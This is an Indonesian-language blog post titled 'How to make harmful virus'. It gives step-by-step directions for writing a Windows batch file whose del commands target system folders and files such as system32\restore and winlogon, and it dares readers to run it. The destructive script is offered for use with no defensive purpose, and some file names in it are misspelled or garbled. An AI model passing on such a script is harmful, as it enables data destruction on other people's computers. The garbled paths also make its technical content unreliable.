How to make harmful virus

Bookmark and Share
saya lagi lagi memberikan anda tentang cara membuat virus, kali ini saya akan memberikan virus yang berbahaya (katanya sih).
oke saya lihat-lihat nampaknya sih virus ini berbahaya.
virus ini sangat sederhana banget.
saya gak brani nyoba virus ini hanya saja saya share buat kalian yang brani nyoba.
nih saya kasih cara membuat virusnya..
pertama buka notepad.
tulislah seperti ini
del"c:\windows\pchealth"
del"C:\windows\system"
del"C:\windows\system32\restore"
del"C:\windows\system32\autoexec.nt"
del"c:\windows\system32\ntoskrni.exe"
del"c:\windows\winlogon.exe.exe"


trus save dengan exetensi .bat


coba aja kalo berani..
hehe

sumber

{ 0 komentar... Views All / Send Comment! }

Posting Komentar

Kritik dan sarannya ya agan-agan semua sangat berguna untuk kemajuan blog ini ^_^